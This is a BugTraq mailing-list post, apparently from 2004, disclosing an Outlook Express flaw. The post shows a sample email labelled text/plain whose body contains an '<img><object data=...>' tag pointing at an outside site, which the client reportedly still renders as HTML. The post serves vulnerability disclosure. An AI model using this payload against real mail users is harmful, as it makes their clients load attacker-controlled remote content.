BugTraq
Re: OBJECT Bugs or Features Jun 08 2004 06:21PM
http-equiv (at) excite (dot) com [email concealed] (1 malware com) (1 replies)


<!--

The headers of your example Email message quite
clearly claim the message is multipart/alternative and the first
part (with the "incomplete" OBJECT tag) is text/html. Thus,
although the body of that MIME component is not a properly
formed, complete HTML document, the MIME Content-Type: headers
provide a fairly strong basis for the MUA treating that message
component as HTML and displaying it accordingly.

-->

and the Outlook Express unique ability to still do the
impossible unpatched after three years:

MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 7bit

<img><object data=http://www.malware.com>

--
http://www.malware.com

[ reply ]
Re: OBJECT Bugs or Features Jun 09 2004 12:23PM
Nick FitzGerald (nick virus-l demon co uk)


 

Privacy Statement
Copyright 2010, SecurityFocus